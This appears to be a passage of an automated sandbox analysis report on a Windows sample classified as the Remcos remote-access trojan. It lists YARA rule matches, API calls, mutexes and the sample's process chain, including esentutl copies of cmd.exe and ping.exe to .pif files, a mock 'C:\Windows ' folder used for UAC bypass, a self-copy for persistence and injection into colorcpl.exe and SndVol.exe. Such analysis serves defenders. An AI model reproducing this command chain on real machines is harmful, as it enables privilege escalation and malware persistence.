                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@34/10@9/4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0467798D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_0041798D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051386A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_051386A8
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02887FD2 GetDiskFreeSpaceA,0_2_02887FD2
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289AD98 CreateToolhelp32Snapshot,0_2_0289AD98
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02896DC8 CoCreateInstance,0_2_02896DC8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0467B539
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467AD09 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0467AD09
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-SKG82E
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: AWkpqJMxci.exeReversingLabs: Detection: 71%
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeFile read: C:\Users\user\Desktop\AWkpqJMxci.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\AWkpqJMxci.exe "C:\Users\user\Desktop\AWkpqJMxci.exe"
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\AWkpqJMxci.exe /d C:\\Users\\Public\\Libraries\\Bzaszylr.PIF /o
                  Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                  Source: unknownProcess created: C:\Users\Public\Libraries\Bzaszylr.PIF "C:\Users\Public\Libraries\Bzaszylr.PIF"
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: unknownProcess created: C:\Users\Public\Libraries\Bzaszylr.PIF "C:\Users\Public\Libraries\Bzaszylr.PIF"
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" "Jump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\AWkpqJMxci.exe /d C:\\Users\\Public\\Libraries\\Bzaszylr.PIF /oJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
